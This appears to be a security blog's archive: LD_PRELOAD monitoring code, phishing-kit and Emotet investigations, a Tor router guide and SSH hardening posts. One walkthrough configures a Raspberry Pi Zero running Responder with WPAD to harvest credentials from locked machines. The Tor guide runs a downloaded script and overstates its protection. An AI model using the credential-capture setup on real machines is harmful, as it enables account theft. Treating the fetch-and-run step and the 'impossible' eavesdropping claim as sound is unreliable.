Userspace Linux Security Monitoring: PART 1

A couple of months ago I read a post by @swagitda_ on the various approaches to monitoring a Linux system. I was already familiar with auditd and its shortcomings. I was not familiar with LD_PRELOAD, but the simplicity of the approach appealed to me, and running in userspace felt like a great idea. I started searching Google for projects that use LD_PRELOAD for monitoring, with no luck. I found lots of code snippets for hooking particular functions, and write-ups on how LD_PRELOAD can be used for privilege escalation under certain circumstances.

My C skills are rusty, but I was itching to build a proof-of-concept monitoring solution that is persistent and cannot be overridden by the user. In this post I will walk you through my experience building a rudimentary solution and hopefully generate enough interest for the community to help start an open source project around it. Part 1 covers what LD_PRELOAD is, why it works and how to get started. Please note this is not a complete solution and definitely requires a lot more work. I am looking for help from the community to build a kick-ass open source Linux security solution. You can fork the code here

Figure 1: Sample Event log

The Linux dynamic loader (ld-linux) is responsible for loading shared libraries, in search order, to resolve the symbols a program uses during execution. LD_PRELOAD is an environment variable containing the path(s) of shared libraries (shared objects) that the loader will load before any other shared library. Because a preloaded object comes first in the search order, its definitions win, which lets us override (hook) library functions and inject our logging code. The example below shows a replacement string-compare function that prints to the screen which strings were compared during a program's execution.

#define _GNU_SOURCE          /* needed for RTLD_NEXT */
#include <dlfcn.h>
#include <stdio.h>

int strcmp(const char *s1, const char *s2) {
	static int (*func_strcmp) (const char *, const char *) = NULL;
	int retval = 0;
	/* Resolve the real strcmp once: RTLD_NEXT skips this object and finds libc's copy */
	if (! func_strcmp)
		func_strcmp = (int (*) (const char*, const char*)) dlsym (RTLD_NEXT, "strcmp");

	printf("Comparing: strcmp( \"%s\" , \"%s\" )\n", s1, s2);
	retval = func_strcmp (s1, s2);
	return retval;
}

The first bit of magic happens in “dlsym (RTLD_NEXT, "strcmp")”. “RTLD_NEXT” tells dlsym to find the next occurrence of the symbol in the search order after the current object, i.e. the entry point of the original strcmp in libc. This allows us to snoop on the parameters passed to the function before passing them along to the original. We need to add “#define _GNU_SOURCE” to our source (before the includes) to make RTLD_NEXT available. The second trick is the compiler: we call gcc with the “-fPIC -nostartfiles -shared” parameters to make our code position independent, to prevent linking of the standard _init, and to produce a shared object. In my case the source file is called “monitor.c” and I used “gcc -fPIC -shared -nostartfiles -m64 -O3 monitor.c -o -ldl“ to compile the 64-bit object and “gcc -fPIC -shared -nostartfiles -m32 -O3 monitor.c -o -ldl“ to compile the 32-bit object. Once the object is compiled you are ready to hook applications by setting the LD_PRELOAD environment variable to the path of your object. Alternatively you can set it inline on the command line.

Figure 2: Executing programs with LD_PRELOAD
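Here is a complete, added example of the same technique (my own code, not the monitor.c from this post): it hooks fopen(3) and execve(2), builds one event line per call with the pid and uid, writes it to stderr and then forwards to the real libc function via dlsym(RTLD_NEXT, ...). The helper names monitor_format_event and monitor_last_event are my own, and the event line format is an assumption chosen to resemble the log in Figure 1.

```c
/* Added example: a minimal LD_PRELOAD monitor (not the post's monitor.c). */
#define _GNU_SOURCE            /* exposes RTLD_NEXT in <dlfcn.h> */
#include <dlfcn.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#ifndef RTLD_NEXT              /* fallback if _GNU_SOURCE came too late for <features.h> */
#define RTLD_NEXT ((void *) -1l)
#endif

/* Last event line, kept so the caller (or a test) can inspect what was logged. */
static char last_event[768];

/* Format one event line: event=<name> pid=<pid> uid=<uid> <detail>.
 * The format is my own assumption; returns what snprintf returns. */
int monitor_format_event(char *buf, size_t len, const char *name, const char *detail)
{
    return snprintf(buf, len, "event=%s pid=%ld uid=%ld %s",
                    name, (long)getpid(), (long)getuid(), detail);
}

/* Emit the event on stderr (a real agent would use syslog or a socket)
 * and remember it in last_event. */
static void monitor_log(const char *name, const char *detail)
{
    monitor_format_event(last_event, sizeof last_event, name, detail);
    fprintf(stderr, "%s\n", last_event);
}

const char *monitor_last_event(void) { return last_event; }

/* Hook for fopen(3): log path and mode, then hand over to the real fopen.
 * RTLD_NEXT resolves to the next object in the search order, i.e. libc,
 * because the preloaded object comes first. */
FILE *fopen(const char *path, const char *mode)
{
    static FILE *(*real_fopen)(const char *, const char *) = NULL;
    if (!real_fopen)
        real_fopen = (FILE *(*)(const char *, const char *)) dlsym(RTLD_NEXT, "fopen");

    char detail[512];
    snprintf(detail, sizeof detail, "path=\"%s\" mode=\"%s\"", path, mode);
    monitor_log("fopen", detail);
    return real_fopen(path, mode);
}

/* Hook for execve(2): log the program path and its argv before it runs.
 * Process execution is the event a monitoring agent usually cares about most. */
int execve(const char *path, char *const argv[], char *const envp[])
{
    static int (*real_execve)(const char *, char *const[], char *const[]) = NULL;
    if (!real_execve)
        real_execve = (int (*)(const char *, char *const[], char *const[]))
                      dlsym(RTLD_NEXT, "execve");

    char detail[512];
    size_t n = (size_t)snprintf(detail, sizeof detail, "path=\"%s\" argv=", path);
    for (int i = 0; argv && argv[i] && n < sizeof detail; i++)
        n += (size_t)snprintf(detail + n, sizeof detail - n, "%s%s", i ? " " : "", argv[i]);
    monitor_log("execve", detail);
    return real_execve(path, argv, envp);
}
```

Build it with the flags from the post, for example gcc -fPIC -shared -nostartfiles -O2 monitor.c -o monitor.so -ldl, then run LD_PRELOAD=./monitor.so ls and watch stderr. Two caveats: keep the logging path free of the functions you hook (a hook on write(2) that logs through fprintf would recurse into itself), and note that for set-user-ID binaries the loader ignores LD_PRELOAD paths taken from the environment (secure-execution mode), which is one reason the system-wide preload file described next matters.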

Now, if you are wondering whether an attacker can simply reset the environment variable, you are absolutely correct. However, you can create a file called “/etc/” containing the path to your monitor object. All dynamically linked binaries are then forced to load that object, and only the root user can modify the file. This is actually really effective, as there is no way for an unprivileged user to bypass it once it is set. The screenshot below shows a user logged into a remote device over SSH running curl to get the WAN IP of the system; the logs below it show the output from the hooked functions. If you are interested, this is the log generated by a test Kali Linux system during reboot.

Figure 3: Shared object hooked system-wide.
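The system-wide file referred to above is /etc/ld.so.preload; the loader reads it for every dynamically linked program, set-user-ID ones included, so its contents deserve the same scrutiny as the monitor object itself: anyone who can write to it, or to an object it names, gets the same code execution the monitor enjoys. The following added check (my own code, not part of the post's project) parses a preload file and flags any entry that is missing, not a regular file, not owned by root, or writable by group or others.

```c
/* Added example: integrity check for /etc/ld.so.preload entries (not the post's code). */
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

/* Reasons an entry can fail the check; 0 means the object looks trustworthy. */
enum preload_issue {
    PRELOAD_OK = 0,
    PRELOAD_MISSING = 1,        /* path does not exist */
    PRELOAD_NOT_REGULAR = 2,    /* not a regular file */
    PRELOAD_NOT_ROOT_OWNED = 4, /* owner is not uid 0 */
    PRELOAD_WRITABLE = 8        /* group- or world-writable */
};

/* Check one object path and return a bitmask of enum preload_issue. */
int audit_preload_object(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return PRELOAD_MISSING;
    int issues = PRELOAD_OK;
    if (!S_ISREG(st.st_mode))
        issues |= PRELOAD_NOT_REGULAR;
    if (st.st_uid != 0)
        issues |= PRELOAD_NOT_ROOT_OWNED;
    if (st.st_mode & (S_IWGRP | S_IWOTH))
        issues |= PRELOAD_WRITABLE;
    return issues;
}

/* Walk the contents of a preload file (whitespace-separated object paths,
 * '#' starts a comment, as documented in ld.so(8)) and count entries with
 * issues. Each problematic entry is reported on stderr. */
int audit_preload_text(const char *text)
{
    int bad = 0;
    char line[1024];
    const char *p = text;
    while (*p) {
        size_t len = strcspn(p, "\n");
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        p += len;
        if (*p == '\n') p++;
        char *hash = strchr(line, '#');
        if (hash) *hash = '\0';
        for (char *tok = strtok(line, " \t\r"); tok; tok = strtok(NULL, " \t\r")) {
            int issues = audit_preload_object(tok);
            if (issues) {
                fprintf(stderr, "preload entry %s: issues 0x%x\n", tok, issues);
                bad++;
            }
        }
    }
    return bad;
}

/* Read a preload file (normally /etc/ld.so.preload) into memory and audit it.
 * An absent file means nothing is forced, so that is reported as 0 issues. */
int audit_preload_file(const char *file)
{
    FILE *f = fopen(file, "r");
    if (!f) return 0;
    char buf[8192];
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    buf[n] = '\0';
    fclose(f);
    return audit_preload_text(buf);
}
```

Run audit_preload_file("/etc/ld.so.preload") from cron or a configuration-management check; a non-zero return is a finding. Pair it with a check that the preload file itself is root-owned and mode 0644, since the same audit_preload_object test applies to it.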

In Part 2 I will go over some of the challenges and issues I ran into, the roadmap for this project, and how to send these logs to an Elastic stack for security monitoring. I believe there is a strong need for a solution like this and huge potential in this approach. I would love to hear your feedback and any help I can get from my Linux / InfoSec community peers. Stay tuned for PART 2.


Unmasking a Phishing campaign targeting major Canadian Banking customers

It was a lazy Sunday afternoon when I got a Twitter alert about an SMS phishing campaign targeting customers of Royal Bank of Canada (RBC).

Smishing (SMS + Phishing)


Being my natural curious self on a slow afternoon I started poking around the site and quickly discovered 2 things:

  1. hxxp://rbc[.]com[.]ssl-sec-mls-119[.]com/r/ - the /r/ portion intrigued me

  2. I also found a page called /r/counter/ by analyzing the form submission page


Going through the data on the counter page I quickly realized that these IP addresses belong to potential victims: out of the 701 records, 60 users (~10%) submitted all the data to the attacker. Sample below.


With this knowledge in mind I wanted to go back to the /r/ and fuzz that letter to see what else returned an HTTP status 200. I hypothesized that the ‘r’ in /r/ stood for “RBC”, so I tried ‘/c/’ for “CIBC” and, to my delight, I got a status 200 and a familiar-looking website.


My immediate next step was to determine whether this had already been used to phish unsuspecting victims, so I made my way over to “/c/counter/”. This time, to my surprise, I saw a total count of 1068 potential victims, again with approximately 10% having provided all their information to the attacker. At this point I decided to fuzz ‘a..z’ and see which letters returned a status 200, and to collect the data from each counter page. I was also convinced by now that this attacker had been doing this for some time and that I had to do something to unmask the operation and the infrastructure at the very least. The research uncovered 6 phishing pages targeting customers of the following Canadian banks.

  1. BMO - /b/

  2. CIBC - /c/

  3. RBC - /r/

  4. Desjardins - /d/

  5. Tangerine - /t/

  6. Scotia Bank - /s/

It was also obvious that all these sites were, or had been, used to phish Canadians.


The Infrastructure

  1. IP - 47[.]74[.]225[.]213

  2. URL - http://rbc[.]com[.]ssl-sec-mls-119[.]com/r/

The domain was registered on the 29th of December, 2018.

Hosted on  Alibaba cloud


111 Parent domains  -


We notified the banks and saw a response from CIBC and RBC. All the domains hosted on this server looked shady and were built for cryptocurrency online casinos and phishing. Check out the Pastebin link if you are interested. One interesting finding from the logs was a submission from ::1, the loopback address, on March 03, 2018. This further confirms that we are dealing with a persistent threat actor.

The attacker testing if the code works? Thoughts?


I would love to hear what you think. How should law enforcement and authorities respond to something like this? Do you feel the banks should do more to identify the impacted users and notify them? Thanks for reading; my slow Sunday afternoon turned out to be fun and I hope you had fun reading.

Malware Analysis: Rech-49415128555.doc (Emotet)

On August 21st quite a few people across organizations received this document in what looks like a large phishing campaign. I wanted to understand what this malware does, as it had very low detection on VirusTotal. Here is my effort to understand the malware and to record indicators for further hunting and investigation.

Step 1:

Identifying the malicious document

MD5: 2f8222f053940fcf6436759762967f45
SHA-1: bcd6f936d1195c265dab3b559a132e08f7a7052f

VirusTotal Link


It looks like some kind of dropper. It was interesting that VT first saw this file in 2010, yet the first submission was on August 21st. Where was it hiding for 7 years?

Step 2:

Detonating the malware

I run a couple of custom (Windows 7 and Windows 10) sandboxes with Sysmon from Sysinternals. All web traffic passes through an intercepting web proxy; the network traffic is analyzed and all metadata is extracted and stored.

What did I learn? (End users are the weakest link)

The first thing the document does is it tricks the user into thinking that the document is actually locked / protected.


Enabling the macro executes PowerShell


This downloads a binary with MD5 = C2FCFB112BB4824FC542D7AB8DFDB627. Searching on VT I realized this is Emotet malware. Not surprisingly, this one has over a 50% detection rate.


Once this executes, it sets up persistence and moves itself from %TEMP% to %USERPROFILE%\AppData\Local\Microsoft\Windows\shedulesystem.exe

C2 IP: (Digital Ocean)




Now that I knew this was Emotet I didn't want to waste too much time on it, but I wanted to make sure I got all the IOCs out. Decoding the Base64-encoded PowerShell command gives me this:


Slightly modifying the decoded code to print the "URL" instead of invoking it gave me all 5 domains:

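The Base64 blob that PowerShell's -EncodedCommand (or -enc) takes is the UTF-16LE encoding of the script, not plain ASCII, so a generic base64 tool yields NUL-interleaved text. The added decoder below (my own code, not from this post) does both steps and is the kind of thing I keep in a triage kit to pull a maldoc's stage-two command out of its process command line without running it. The inputs in the test are constructed; the well-known prefix SQBFAFgA is simply the encoding of IEX.

```c
/* Added example: decode a PowerShell -EncodedCommand argument (not the post's code). */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Map one base64 alphabet character to its 6-bit value, -1 if invalid. */
static int b64_value(int c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decode base64 text into out (capacity outlen). Whitespace is skipped and
 * '=' ends the data. Returns bytes written, or -1 on an invalid character
 * or insufficient space. */
long base64_decode(const char *in, unsigned char *out, size_t outlen)
{
    unsigned int acc = 0;
    int bits = 0;
    size_t n = 0;
    for (; *in && *in != '='; in++) {
        if (*in == ' ' || *in == '\n' || *in == '\r' || *in == '\t') continue;
        int v = b64_value((unsigned char)*in);
        if (v < 0) return -1;
        acc = (acc << 6) | (unsigned int)v;
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n >= outlen) return -1;
            out[n++] = (unsigned char)((acc >> bits) & 0xFF);
        }
    }
    return (long)n;
}

/* Decode an -EncodedCommand value: base64 of UTF-16LE text. Code units that
 * are not printable ASCII (or tab/newline) are rendered as '?'. Returns the
 * length of the resulting string, or -1 on bad input. */
long decode_powershell_command(const char *encoded, char *out, size_t outlen)
{
    unsigned char raw[4096];
    long n = base64_decode(encoded, raw, sizeof raw);
    if (n < 0) return -1;
    size_t len = 0;
    for (long i = 0; i + 1 < n; i += 2) {
        if (len + 1 >= outlen) return -1;
        unsigned int unit = raw[i] | ((unsigned int)raw[i + 1] << 8);
        if ((unit >= 0x20 && unit < 0x7F) || unit == '\n' || unit == '\r' || unit == '\t')
            out[len++] = (char)unit;
        else
            out[len++] = '?';
    }
    out[len] = '\0';
    return (long)len;
}
```

Once the script is in the clear, the download URLs are usually visible as string literals or as a split/join expression; either way the text, not the running code, is what you want to pull indicators from.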

Step 3:

Back to basics


Take all the IOCs and build a use case for the SIEM / SOC. #DFIR FTW! I hope you enjoyed reading this as much as I enjoyed doing it.

UPDATE: We are selling these Tor Privacy routers

We are selling these #privacy #torbox routers for CA$35 + shipping. Message me if you are interested.
Paypal:    cmaj(at)
Bitcoin    156SLTpHjWRkLhkgz8mRNmbbwxuERZ3irY
You can DIY too

User manual

Make a cheap TOR anonymizer

I had a few friends ask if they could buy a cheap travel router that protects their internet activity as they travel around the globe. So my criteria were:

  1. Cheap (<$20.00)
  2. Portable (ideally pocket size)

I knew I wanted a little travel router that supports OpenWRT and has enough RAM and storage to install Tor. There were a few routers that I liked, but I settled on the NEXX WT3020H. There are a couple of models that look the same; except for the "A" model they are all identical. Don't get the A model: it does not have enough resources to run LuCI and Tor. The pictures below are of my WT3020H. I purchased mine from Aliexpress link

There are a few getting-started articles online that explain how to install OpenWRT on this device and how to install Tor. Everything I have seen so far is incomplete: it either allows DNS leaks or doesn't allow .onion URLs. This is why I wanted to write this post and help anyone else who is trying to do the same. The script is agnostic of the hardware, so it should install on other OpenWRT devices too.

Installing OpenWRT Chaos Calmer on the device

Connect your computer to the LAN port on the device and follow along:

$ telnet
Connected to
Escape character is '^]'.

(none) login: nexxadmin
Password: y1n2inc.com0755

BusyBox v1.12.1 (2016-11-14 18:04:51 HKT) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# cd /tmp
# wget
Connecting to (
openwrt-15.05-ramips 100% |*******************************| 3328k 00:00:00 ETA
# mtd_write -r write openwrt-15.05-ramips-mt7620-wt3020-8M-squashfs-sysupgrade.bin mtd3
Unlocking mtd3 ...
Writing from openwrt-15.05-ramips-mt7620-wt3020-8M-squashfs-sysupgrade.bin to mtd3 ... [e]

The device should reboot, and at this point you should be running OpenWRT 15.05. Release and renew your computer's DHCP lease. Ensure you have an IP in the range of (probably

$ telnet
Connected to openwrt.lan.
Escape character is '^]'.
=== IMPORTANT ============================
Use 'passwd' to set your login password
this will disable telnet and enable SSH

BusyBox v1.23.2 (2016-11-14 03:03:02 CEST) built-in shell (ash)

CHAOS CALMER (15.05, r46767)
* 1 1/2 oz Gin Shake with a glassful
* 1/4 oz Triple Sec of broken ice and pour
* 3/4 oz Lime Juice unstrained into a goblet.
* 1 1/2 oz Orange Juice
* 1 tsp. Grenadine Syrup
root@OpenWrt:/# passwd
Changing password for root
New password: 
Retype password: 
Password for root changed by root
root@OpenWrt:/#

Installing TOR and configuring iptables

SSH in to your device and complete the steps below:

$ ssh [email protected]
$ wget
$ mv Yd5mXksr
$ sh ./ 
$ reboot

After the device reboots login to Luci (

  1. Browse to Network -> Interfaces
  2. Click the "Edit" button for "LAN"
  3. Scroll down to the "DHCP Server" section and click on "Advanced Settings"
  4. Add an entry to "DHCP-Options "6," (without the quotes)
  5. Click Save and Apply (may take a couple of minutes)
  6. Reboot the router.

That's all: the device will now intercept any TCP traffic and UDP DNS traffic on the LAN interface and route it through Tor, making eavesdropping impossible.

Please let me know what your thoughts are and if you have any questions. The script will be on Spend the $20 stay secure :)

Snagging creds from locked machines with RaspberryPi Zero

I get really excited any time I get to use my Raspberry Pi Zero. When I saw Rob Fuller's (@mubix) tweet this morning I got really excited. Coincidentally I have a thing for single-board computers and have been playing with the USB gadget mode of the Pi Zero for the last couple of weeks. As soon as I saw the tweet I knew I had to do this with the Pi Zero.


  1. RaspberryPi Zero
  2. 4GB or larger Micro SD Card
  3. OTG USB Cable
  4. USB Ethernet adapter or WiFi Dongle (initial setup)

I am going to assume that the reader knows how to flash an image onto the SD card. I went with the Raspbian Lite version; it is better with RAM utilization on the Pi. Boot up the Raspberry Pi Zero and install the required software:

sudo apt-get install -y python git python-pip python-dev screen sqlite3 isc-dhcp-server
sudo pip install pycrypto
sudo su
cd ~/
git clone

Edit /etc/network/interfaces

Open /etc/network/interfaces with your favorite text editor and add the following to it:

auto usb0
allow-hotplug usb0
iface usb0 inet static

Configure DHCPD Settings: /etc/dhcp/dhcpd.conf

Edit /etc/dhcp/dhcpd.conf and replace the contents with the text below:

ddns-update-style none;
option domain-name "domain.local";
option domain-name-servers;
default-lease-time 60;
max-lease-time 72;
# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;
# wpad
option local-proxy-config code 252 = text;
# A slightly different configuration for an internal subnet.
subnet netmask {
option routers;
option local-proxy-config "";

Edit /etc/rc.local

Edit /etc/rc.local and add the following before exit 0:

# Clear leases
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases
# Start DHCP server
# Start Responder
/usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python -I usb0 -f -w -r -d -F'

Create the configuration file for screen

sudo su; nano ~/.screenrc and add this:

# Logging
deflog on
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log

Once the above steps are completed, shut down the Pi Zero (shutdown -h now) and remove the micro SD card. Connect the micro SD card to your computer. We need to modify config.txt and cmdline.txt to turn the OTG port into a virtual Ethernet port. Please ensure that you are running a version of Raspbian released after May 2016.

Edit config.txt

Add this after the last line:


Edit cmdline.txt

After rootwait (the last word on the first line) add a space and then 



Safely eject the micro SD card and put it back in the Pi Zero. The device is ready: use the USB OTG cable to connect it to the PC, and happy hacking!

TOP 5: Personal Security Tips

I have been working in a systems administrator role for over 10 years, and I am constantly asked by home users and peers at work how to secure infrastructure and how to monitor it effectively. One of the biggest issues with securing infrastructure is identifying potential attack vectors and running risk analysis scenarios. Unfortunately this also means understanding who is trying to attack you or your business and what's in it for them.

I would like to start off with securing your personal infrastructure, and later show how this ties in with securing your business. The biggest reason for personal attacks is identity theft. Let's face it, money is the biggest motivation in this industry. Building a botnet or zombie network is another reason why evil-doers want control over your system(s): they want your compute power and they need your bandwidth to launch DDoS attacks against services. In the world we live in, these types of attacks are orchestrated by two distinct groups:

  1. Identity Theft ==> Organized crime syndicates , family and friends
  2. Bot net ==> Spammers, Hacktivists, Script kiddies and organized crime syndicates

Now that we have identified the two most common types of personal attacks, let's see what we can do to secure ourselves. I should point out a couple of things before we get to the nitty-gritty:

  1. Paranoia is good. The consensus among people like us is to keep an open mind but question everything.
  2. If you make it difficult for attackers, they will quickly move along to the next unsuspecting victim.

Now that I got this off my chest, let's see what we can do in our personal lives to stay secure. I titled this article "TOP 5" so I will highlight the top five tips for personal security:

  1. Do not use the same password everywhere. Use different passwords for every service you use online, your home WiFi, your email, your password to log in to your computer, etc. Do not use simple passwords, passwords shorter than 8 characters, or dictionary words. Instead use complex 9+ character passwords with numbers, upper and lower case characters, and special characters (!, @, #, etc.). Use two-factor authentication for services that offer it (Google, Facebook, Microsoft, Twitter, and many more). If you are thinking this is insane and wondering how you can memorize such passwords, you are thinking along the right path: passwords that are easy to remember are easy to hack. Instead, use an application like KeePass or Password Safe to track your passwords. KeePass works on Windows, Linux, Mac OS and smartphones, and I use it for storing my passwords.
  2. Do not use pirated software. The issue with pirated software is that almost 99.9999% of the time the software has been tampered with to bypass the activation / security that prevents unauthorized usage. What you almost never know is what else was changed. Applications downloaded from shady websites may include malware that installs along with the software, giving the attacker persistent access to your system. We have seen this trend in the industry over and over again: rootkits embedded in applications downloaded from torrents. Here is a link to such an attack from 2011 to show that this is not a new trend. Another issue with cracked software is that it cannot be updated, leaving you stuck with an old, vulnerable version and tempting fate.
  3. Regularly update your system and run good antivirus software. Enterprises patch vulnerabilities in their systems. This is a cyclical process, and patches are created as vulnerabilities are discovered. The problem with running old software is that there is a very good chance your system has a vulnerability and that an active exploit for it is being used by evil-doers to gain access. If you prefer to wait before patching, prioritizing what to patch is a good idea too: web browsers and plugins (Flash, Java, Acrobat Reader) are usually the most attacked software. If you like visiting questionable sites, or get emails with attachments from unknown people, use a sandboxed environment for your day-to-day stuff. Sandboxie is a great application that does this. If you use a professional antivirus solution, like Avast, it comes with this option built in. Also, please keep your firewall turned on. Firewalls were designed for a good reason, and they act as the first line of defense against online threats.
  4. Back up your systems regularly. We are seeing increasing growth of "ransomware". This is a new type of malware that holds your personal data hostage and, unless you pay, the attackers won't provide you with the keys to decrypt your data. If you have regular backups, you can simply restore the data from backup. Both Windows and Mac OS have great backup solutions baked into the operating system for free. This way, if you have hardware damage and/or malware destroys your files, you can get your data back without breaking a sweat or your bank account. If you prefer a third-party backup solution, companies like Acronis provide reliable products.
  5. If you've implemented points 1-4, you are already doing a good job of staying secure; just don't get social-engineered into giving up your data to strangers. This is one of the most important issues in security: the human factor. Be careful what you post on social media, and be careful what information you give out to people. If you tell everyone that your first pet's name was "fluffy" and the security question for your favorite mail service is "what is your first pet's name?", then it does not matter how secure your password is: it will be easy to reset it and take over your email account. This also means that if this email was used to sign up for other services, those services then get owned by the attacker too. I will leave the rest of this tip to your imagination, but this is why paranoia is a good friend. Question everything and be very careful about the information you give out freely. I want to add: avoid using open WiFi, or at least use a VPN connection when surfing from an open WiFi hotspot.

Please let me know what you think in the comments below. If you disagree, I would love to see some feedback and constructive criticism as I prepare for the TOP 5: Enterprise Security Tips.

8 Node +1 Master: RaspberryPi Cluster running MPI and crunching numbers...

My quest for learning and building parallelism turned a new page. I mustered the courage to build a Raspberry Pi MPI cluster to test and write MPI code. A couple of my friends at the University of Alberta have been running MPI-based code to crunch fluid dynamics problems. My goal was to build a farm of CPUs I can dedicate to doing #STUFF at a very cheap price point.



  1. Has to be affordable
  2. Has to look presentable

Parts List:


  1. 9 x Raspberry Pi from
  2. 9 x 8GB Class 10 SD Cards (local computer store)
  3. 5V 12A, 60W PSU
  4. 18 x Female to Female jumper cables
  5. 18 x header pins
  6. 1 x PCB, 1 x 440uF capacitor, 1 x 220 & 1 x LED
  7. 16 Port 10/100 MB switch (had one available)
  8. 10 x CAT 5 patch cables




I used my 3D printer to print these frames I found on Thingiverse.



I used PLA and the finished product looked quite nice. It took about 2 hours to print 4 frames; after about 5 hours I had the bottom and the top pieces printed. I also started installing Raspbian on the 9 SD cards, using Win32DiskImager on a Windows 7 machine. I started inserting the Pis into the bottom pieces and then realized the biggest issue with this concept would be delivering power to the Pis. So I decided to build my own. The Pis draw about 450mA - 550mA depending on CPU load; with 9 of them I needed a PSU that can provide at least 5.5 A to be safe. I soon realized that when these Pis power on they can draw up to 700mA. So I purchased a 5V 12A switching PSU from my local store and built a simple power distribution circuit.


The DIP switches can turn the Pis on or off. The main purpose of the 220uF capacitor is to smooth out the voltage; it is probably not required. The red LED tells me that the PSU is on and supplying power. I built 2 of these while trying out a couple of different designs. I used the female jumpers to power the Pis.


Once the Pis were powered up I SSHed into them and used "sudo raspi-config" to set the CPU to run at 800MHz, the GPU RAM to 16MB, and to expand the image to use the full 8GB. I could feel my goal getting closer to completion with every keystroke. I wrote a little shell script to automate the MPI installation and configuration. It's not 100% automated, but close enough:

apt-get update && apt-get upgrade -y
sudo apt-get install gfortran -y
mkdir mpi_install
cd mpi_install
tar xfz mpich2-1.4.1p1.tar.gz
cd mpich2-1.4.1p1
./configure && make && sudo make install
echo "Please answer the following questions to continue:"
sudo python

And that was it: my MPI cluster was ready. Since then I have run several example codes, yes, including calculating the digits of Pi.

I will post more, with code examples and a performance review, as soon as I get some more time. Till then, happy hacking.


Secure SSH with 2 Factor Authentication


  1. This article applies to Debian based Linux and Ubuntu variants
  2. Does not work if the user's home drive is encrypted

Getting started:

I will be demonstrating how to use the Google Authenticator PAM module for two-factor authentication. Google Authenticator uses a time-based OTP algorithm and does not phone home to work. You will need an Android or iOS device with the Google Authenticator app installed.

Install the Google authentication module by opening terminal and typing in:

sudo apt-get install libpam-google-authenticator

Generate an authentication key by running this command:


Follow the instructions to generate a key by pressing "y". Copy the secret key, the verification code and the scratch codes and store them securely. Scan the bar code with the app on your phone to initialize the code. Please note that at this point we have only installed the module and generated a key; we still have to enable the PAM module for SSH login manually. The steps below update the "pam.d" config file to allow "", set "ChallengeResponseAuthentication yes" in "sshd_config", and then restart the SSH service.

Open pam.d/sshd with vi or nano:

sudo nano /etc/pam.d/sshd and add the line

"auth required"

Open sshd_config and locate ChallengeResponseAuthentication line, and edit it to say:

sudo nano /etc/ssh/sshd_config
"ChallengeResponseAuthentication yes"

Restart SSH service:

sudo service ssh restart

Next time you SSH in you will be prompted for your password and the OTP before you are authenticated.

SSH Tunnelling & Secure Browsing: Part III

ssh -D 8080:localhost

This time I will go over setting up SSH client in Linux, setting up key pairs and how to implement keys for authentication in Linux and in Windows.

Setting up tunnelling in Linux is as easy as typing in:



SSH Tunnelling & Secure Browsing: Part II

If you have completed Part I, you should have a running SSH server ready to tunnel all your needs. If you are on a PC running Microsoft's Windows operating system like me, download PuTTY 0.62-installer.exe from and install it. PuTTY will be our SSH client and we are going to cover:

  1. Password Authentication
  2. Asymmetric Key based authentication (RSA)

The second method is the most secure if implemented properly. Once PuTTY is installed it should have created an icon on your desktop. Open PuTTY and you will see the screen below:

Default PuTTY Screen

Fill in the fields as necessary:

  • Host Name: [username]@[server name] or [IP address]
  • Port: the default port is 22 ***
  • Connection type: SSH
  • Saved Sessions: [any name of your liking]

Once this information is filled in click on "Connection" > expand "SSH" > "Tunnels" and fill the tunnel information.

Tunnel Configuration

Click Add when done. On the menu to the left, scroll all the way up, click "Session" and then click "Save" to save the configuration. Click "Open" to launch the connection; if this is the first time you are connecting, PuTTY will warn that the host key is not recognized. Click Yes to save the key in the registry (I will go over key verification in another post). You will be prompted for your password at this stage; type it to complete the process. Once in, open your browser of choice and change the proxy settings to SOCKSv5 Server / IP =, Port: 8090, and you will be tunneling traffic like 1337.

Part III will cover setting up the SSH client in Linux and public / private key based authentication in Linux and Windows. Hope you enjoyed it; please comment below.

SSH Tunnelling & Secure Browsing: Part I

Checking your Facebook page from Starbucks? Checked your banking information from the Hotel WiFi? Or are you going to Defcon this year? 

Public internet is not secure, and there is a need for secure browsing. There are many ways to achieve this, obfuscate the traffic from eavesdroppers and protect ourselves against Man-in-the-Middle (MITM) attacks. After trying a few different solutions like the Tor Project, Hotspot Shield and others like them, I decided to set up my own SSH server so that I can create a secure tunnel between my laptop and the SSH server and use it as a SOCKSv5 proxy. If you are still interested, I will try to cover the following topics over the next few days:
  1. Install and configure a SSH Server (FreeBSD 9.0)
  2. Create users.
  3. Secure and harden the server.
  4. Configure SSH client (PuTTY) in windows
  5. Create Public and Private keys for authentication
  6. Set up Password-less login.
I wanted to point out that FreeBSD is really stable, uses very few resources to run, and is my server of choice. I have tested the same steps on Debian 6.0.4 and they work just as well. All the steps I am about to show should be easy to replicate on any *NIX type system. I also wanted to point out that a Virtual Private Server will give you better performance than hosting the SSH server at home.
Server Specs:

Installation Steps:

  1. Create the Guest Machine (Guest VM Configuration)
  2. Save and Power On. VM should boot from DVD press Enter to continue.
  3. Play this video for actual installation step

Configuration Steps:

  • Create a new user by typing "adduser" then Enter. P.S. add the user to the "wheel" group so that the user can invoke "su -"

FreeBSD Account Setup

  •  Login as the newly created user
  • mkdir ~/.ssh
  • chmod 700 .ssh
  • su -
  • Enter root password
  • cp /etc/ssh/sshd_config ~/sshd_config.orig
  • cd /home/n3onli8
  • cp /etc/ssh/sshd_config /home/n3onli8/sshd_config
  • vi sshd_config
  • I configured it to look like:

Protocol 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key

KeyRegenerationInterval 1h
ServerKeyBits 1024
LoginGraceTime 2m
PermitRootLogin no
